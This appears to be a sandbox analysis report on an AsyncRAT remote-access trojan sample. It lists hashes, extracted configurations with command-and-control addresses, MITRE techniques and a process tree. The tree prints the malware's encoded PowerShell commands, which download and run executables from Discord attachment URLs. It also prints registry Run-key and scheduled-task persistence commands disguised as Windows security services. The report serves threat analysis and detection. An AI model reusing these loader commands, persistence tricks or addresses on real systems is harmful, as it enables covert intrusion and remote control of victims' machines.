asyncrat | a227c96af593108664720742c60c200d370094fb1c2acf8ff5516611917f2c64

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
12-12-2022 12:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JHGSD37623.exe
Size

537KB
MD5

43f232536b413ebf169141944069ae77
SHA1

0efc90691d45072ddd595cc4c2258e2f4bea42de
SHA256

a227c96af593108664720742c60c200d370094fb1c2acf8ff5516611917f2c64
SHA512

3adb48ae6dcdfbea2ac3bea9439e1d5d44884a3a5d5f3ac31ff9ad7a437f8a877a4ca8a1eda9213d4bced7e5c1181a0197aa957d422620a83fbbc745b0f470f6
SSDEEP

12288:g4lThwQGIQilGzWTifG1g6eUtEsx1P5W1Zrr004mTbtoMA:RlTOFq7TifGG66sv5W1Zrndbt

Score

10^/10

asyncrat defendersmartscren system guard runtime persistence rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4376-254-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4708-293-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

30 4708 powershell.exe
48 1388 powershell.exe
55 3436 powershell.exe
59 880 powershell.exe
64 1852 powershell.exe
67 3104 powershell.exe
Downloads MZ/PE file

flow	pid	process
30	4708	powershell.exe
48	1388	powershell.exe
55	3436	powershell.exe
59	880	powershell.exe
64	1852	powershell.exe
67	3104	powershell.exe

Executes dropped EXE 19 IoCs

Processes:

MJBI24ctOq.exeRerLvnKXzV.exebK4sQoPuu2.exee7PXLZ21Fb.exedHd7z5frvm.exeu1dgvDBSp9.exeyTJoK2omPR.exef3ERcAfAXH.exe3p3NPb03al.exeGxkmQwLmRs.exe8t8gpkjJCf.exeHDJ3.exeDFSH3.exeFDJSDC41.exePOQIWE3.exeHDJ3.exePODSFB1.exeMNXAS123.exeFDJSDC41.exe

pid	process
4728	MJBI24ctOq.exe
3508	RerLvnKXzV.exe
3740	bK4sQoPuu2.exe
908	e7PXLZ21Fb.exe
1516	dHd7z5frvm.exe
3248	u1dgvDBSp9.exe
4572	yTJoK2omPR.exe
3160	f3ERcAfAXH.exe
4556	3p3NPb03al.exe
2996	GxkmQwLmRs.exe
2908	8t8gpkjJCf.exe
224	HDJ3.exe
3976	DFSH3.exe
3420	FDJSDC41.exe
2288	POQIWE3.exe
2128	HDJ3.exe
4876	PODSFB1.exe
4932	MNXAS123.exe
3188	FDJSDC41.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/2672-132-0x00007FF601190000-0x00007FF6012F3000-memory.dmp	upx
behavioral2/memory/2672-194-0x00007FF601190000-0x00007FF6012F3000-memory.dmp	upx

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

f3ERcAfAXH.exe3p3NPb03al.exeGxkmQwLmRs.exeRerLvnKXzV.exebK4sQoPuu2.exedHd7z5frvm.exeyTJoK2omPR.exeMJBI24ctOq.exee7PXLZ21Fb.exeu1dgvDBSp9.exe8t8gpkjJCf.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	f3ERcAfAXH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	3p3NPb03al.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	GxkmQwLmRs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	RerLvnKXzV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	bK4sQoPuu2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	dHd7z5frvm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	yTJoK2omPR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	MJBI24ctOq.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	e7PXLZ21Fb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	u1dgvDBSp9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	8t8gpkjJCf.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exepowershell.exeMNXAS123.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	MNXAS123.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

DFSH3.exeHDJ3.exePOQIWE3.exeFDJSDC41.exeHDJ3.exe

description	pid	process	target process
PID 3976 set thread context of 4376	3976	DFSH3.exe	RegAsm.exe
PID 224 set thread context of 3432	224	HDJ3.exe	RegAsm.exe
PID 2288 set thread context of 4708	2288	POQIWE3.exe	RegAsm.exe
PID 3420 set thread context of 396	3420	FDJSDC41.exe	RegAsm.exe
PID 2128 set thread context of 3936	2128	HDJ3.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3632 4876 WerFault.exe PODSFB1.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2336 schtasks.exe
3908 schtasks.exe

pid	pid_target	process	target process
3632	4876	WerFault.exe	PODSFB1.exe

pid	process
2336	schtasks.exe
3908	schtasks.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1388	powershell.exe
1388	powershell.exe
4708	powershell.exe
4708	powershell.exe
3436	powershell.exe
3436	powershell.exe
880	powershell.exe
880	powershell.exe
3436	powershell.exe
4708	powershell.exe
1388	powershell.exe
1852	powershell.exe
1852	powershell.exe
880	powershell.exe
3104	powershell.exe
3104	powershell.exe
4804	powershell.exe
4804	powershell.exe
3308	powershell.exe
3308	powershell.exe
3780	powershell.exe
3780	powershell.exe
1852	powershell.exe
3256	powershell.exe
3256	powershell.exe
4924	powershell.exe
4924	powershell.exe
3256	powershell.exe
3104	powershell.exe
3308	powershell.exe
4804	powershell.exe
3780	powershell.exe
4924	powershell.exe
2140	powershell.exe
2140	powershell.exe
2140	powershell.exe
3264	powershell.exe
3264	powershell.exe
3264	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeHDJ3.exepowershell.exeFDJSDC41.exeHDJ3.exe

description	pid	process
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	880	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	224	HDJ3.exe
Token: SeDebugPrivilege	3264	powershell.exe
Token: SeDebugPrivilege	3420	FDJSDC41.exe
Token: SeDebugPrivilege	2128	HDJ3.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

JHGSD37623.execmd.execmd.execmd.execmd.exeMJBI24ctOq.exeRerLvnKXzV.exebK4sQoPuu2.exee7PXLZ21Fb.execmd.exeWaaSMedicAgent.exedHd7z5frvm.execmd.execmd.exeu1dgvDBSp9.execmd.exeyTJoK2omPR.exef3ERcAfAXH.execmd.exe3p3NPb03al.execmd.exeGxkmQwLmRs.exe

description	pid	process	target process
PID 2672 wrote to memory of 3344	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 3344	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 1152	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 1152	2672	JHGSD37623.exe	cmd.exe
PID 3344 wrote to memory of 4728	3344	cmd.exe	MJBI24ctOq.exe
PID 3344 wrote to memory of 4728	3344	cmd.exe	MJBI24ctOq.exe
PID 2672 wrote to memory of 3148	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 3148	2672	JHGSD37623.exe	cmd.exe
PID 1152 wrote to memory of 3508	1152	cmd.exe	RerLvnKXzV.exe
PID 1152 wrote to memory of 3508	1152	cmd.exe	RerLvnKXzV.exe
PID 3148 wrote to memory of 3740	3148	cmd.exe	bK4sQoPuu2.exe
PID 3148 wrote to memory of 3740	3148	cmd.exe	bK4sQoPuu2.exe
PID 2672 wrote to memory of 4456	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 4456	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 4144	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 4144	2672	JHGSD37623.exe	cmd.exe
PID 4456 wrote to memory of 908	4456	cmd.exe	e7PXLZ21Fb.exe
PID 4456 wrote to memory of 908	4456	cmd.exe	e7PXLZ21Fb.exe
PID 4728 wrote to memory of 4708	4728	MJBI24ctOq.exe	powershell.exe
PID 4728 wrote to memory of 4708	4728	MJBI24ctOq.exe	powershell.exe
PID 3508 wrote to memory of 1388	3508	RerLvnKXzV.exe	powershell.exe
PID 3508 wrote to memory of 1388	3508	RerLvnKXzV.exe	powershell.exe
PID 3740 wrote to memory of 3436	3740	bK4sQoPuu2.exe	powershell.exe
PID 3740 wrote to memory of 3436	3740	bK4sQoPuu2.exe	powershell.exe
PID 2672 wrote to memory of 2564	2672	JHGSD37623.exe	WaaSMedicAgent.exe
PID 2672 wrote to memory of 2564	2672	JHGSD37623.exe	WaaSMedicAgent.exe
PID 2672 wrote to memory of 2520	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 2520	2672	JHGSD37623.exe	cmd.exe
PID 908 wrote to memory of 880	908	e7PXLZ21Fb.exe	powershell.exe
PID 908 wrote to memory of 880	908	e7PXLZ21Fb.exe	powershell.exe
PID 4144 wrote to memory of 1516	4144	cmd.exe	dHd7z5frvm.exe
PID 4144 wrote to memory of 1516	4144	cmd.exe	dHd7z5frvm.exe
PID 2672 wrote to memory of 3392	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 3392	2672	JHGSD37623.exe	cmd.exe
PID 2564 wrote to memory of 3248	2564	WaaSMedicAgent.exe	u1dgvDBSp9.exe
PID 2564 wrote to memory of 3248	2564	WaaSMedicAgent.exe	u1dgvDBSp9.exe
PID 2672 wrote to memory of 4720	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 4720	2672	JHGSD37623.exe	cmd.exe
PID 1516 wrote to memory of 1852	1516	dHd7z5frvm.exe	powershell.exe
PID 1516 wrote to memory of 1852	1516	dHd7z5frvm.exe	powershell.exe
PID 2520 wrote to memory of 4572	2520	cmd.exe	yTJoK2omPR.exe
PID 2520 wrote to memory of 4572	2520	cmd.exe	yTJoK2omPR.exe
PID 2672 wrote to memory of 3432	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 3432	2672	JHGSD37623.exe	cmd.exe
PID 3392 wrote to memory of 3160	3392	cmd.exe	f3ERcAfAXH.exe
PID 3392 wrote to memory of 3160	3392	cmd.exe	f3ERcAfAXH.exe
PID 2672 wrote to memory of 388	2672	JHGSD37623.exe	cmd.exe
PID 2672 wrote to memory of 388	2672	JHGSD37623.exe	cmd.exe
PID 3248 wrote to memory of 3104	3248	u1dgvDBSp9.exe	powershell.exe
PID 3248 wrote to memory of 3104	3248	u1dgvDBSp9.exe	powershell.exe
PID 4720 wrote to memory of 4556	4720	cmd.exe	3p3NPb03al.exe
PID 4720 wrote to memory of 4556	4720	cmd.exe	3p3NPb03al.exe
PID 4572 wrote to memory of 3308	4572	yTJoK2omPR.exe	powershell.exe
PID 4572 wrote to memory of 3308	4572	yTJoK2omPR.exe	powershell.exe
PID 3160 wrote to memory of 4804	3160	f3ERcAfAXH.exe	powershell.exe
PID 3160 wrote to memory of 4804	3160	f3ERcAfAXH.exe	powershell.exe
PID 3432 wrote to memory of 2996	3432	cmd.exe	GxkmQwLmRs.exe
PID 3432 wrote to memory of 2996	3432	cmd.exe	GxkmQwLmRs.exe
PID 4556 wrote to memory of 3780	4556	3p3NPb03al.exe	powershell.exe
PID 4556 wrote to memory of 3780	4556	3p3NPb03al.exe	powershell.exe
PID 388 wrote to memory of 2908	388	cmd.exe	8t8gpkjJCf.exe
PID 388 wrote to memory of 2908	388	cmd.exe	8t8gpkjJCf.exe
PID 2996 wrote to memory of 4924	2996	GxkmQwLmRs.exe	powershell.exe
PID 2996 wrote to memory of 4924	2996	GxkmQwLmRs.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\JHGSD37623.exe
"C:\Users\Admin\AppData\Local\Temp\JHGSD37623.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\MJBI24ctOq.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3344

C:\Users\Admin\AppData\Local\Temp\MJBI24ctOq.exe
C:\Users\Admin\AppData\Local\Temp\MJBI24ctOq.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcgB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUAMQAxADcAMwA3ADYAOAAxADIAMAAyADQANgA0ADEAMwAvADEAMAA1ADEAMQA3ADUAMQA5ADkANAA0ADMAMgA2ADMANQA3ADkALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAHEAeQBiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBjAGoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaABnAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABEAEoAMwAuAGUAeABlACcAKQApADwAIwBpAGMAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBtAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQB1AHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABEAEoAMwAuAGUAeABlACcAKQA8ACMAbABwAGsAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708

C:\Users\Admin\AppData\Roaming\HDJ3.exe
"C:\Users\Admin\AppData\Roaming\HDJ3.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:224

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:3432

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\RerLvnKXzV.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\Users\Admin\AppData\Local\Temp\RerLvnKXzV.exe
C:\Users\Admin\AppData\Local\Temp\RerLvnKXzV.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAZAB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADEANwAzADcANgA4ADEAMgAwADIANAA2ADQAMQAzAC8AMQAwADUAMQAxADcANQAyADEANAAyADAANwAyADIANQA4ADYANgAvAEMAUgAuAGUAeABlACcALAAgADwAIwBpAHgAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAZQB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAcABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQARgBTAEgAMwAuAGUAeABlACcAKQApADwAIwBhAHQAdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAG0AaAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBtAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABGAFMASAAzAC4AZQB4AGUAJwApADwAIwBuAHoAdgAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Users\Admin\AppData\Roaming\DFSH3.exe
"C:\Users\Admin\AppData\Roaming\DFSH3.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
6⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
6⤵
PID:4376

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
6⤵
PID:3496

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2336

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\bK4sQoPuu2.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3148

C:\Users\Admin\AppData\Local\Temp\bK4sQoPuu2.exe
C:\Users\Admin\AppData\Local\Temp\bK4sQoPuu2.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcQBtACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADEANwAzADcANgA4ADEAMgAwADIANAA2ADQAMQAzAC8AMQAwADUAMQAxADcANQAyADQAMQAwADAAOAA4ADEAMgAxADAAMgAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZQBhAGcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB1AHkAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAGIAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBGAEQASgBTAEQAQwA0ADEALgBlAHgAZQAnACkAKQA8ACMAaQBiAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAawBmAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAZABmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYARABKAFMARABDADQAMQAuAGUAeABlACcAKQA8ACMAeQB5AGkAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436

C:\Users\Admin\AppData\Roaming\FDJSDC41.exe
"C:\Users\Admin\AppData\Roaming\FDJSDC41.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3420

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:396

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\e7PXLZ21Fb.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4456

C:\Users\Admin\AppData\Local\Temp\e7PXLZ21Fb.exe
C:\Users\Admin\AppData\Local\Temp\e7PXLZ21Fb.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYgB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQAxADEANwAzADcANgA4ADEAMgAwADIANAA2ADQAMQAzAC8AMQAwADUAMQAxADcANQAyADYAMAAzADkAMAA2ADgANgA3ADkAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGQAcQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZgBhAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFEASQBXAEUAMwAuAGUAeABlACcAKQApADwAIwBkAG0AdwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAG0AZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBsAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFEASQBXAEUAMwAuAGUAeABlACcAKQA8ACMAYwBkAHMAIwA+AA=="
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880

C:\Users\Admin\AppData\Roaming\POQIWE3.exe
"C:\Users\Admin\AppData\Roaming\POQIWE3.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
6⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
6⤵
PID:3660

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:3908

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
6⤵
PID:4708

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\dHd7z5frvm.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4144

C:\Users\Admin\AppData\Local\Temp\dHd7z5frvm.exe
C:\Users\Admin\AppData\Local\Temp\dHd7z5frvm.exe
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\u1dgvDBSp9.exe
2⤵
PID:2564

C:\Users\Admin\AppData\Local\Temp\u1dgvDBSp9.exe
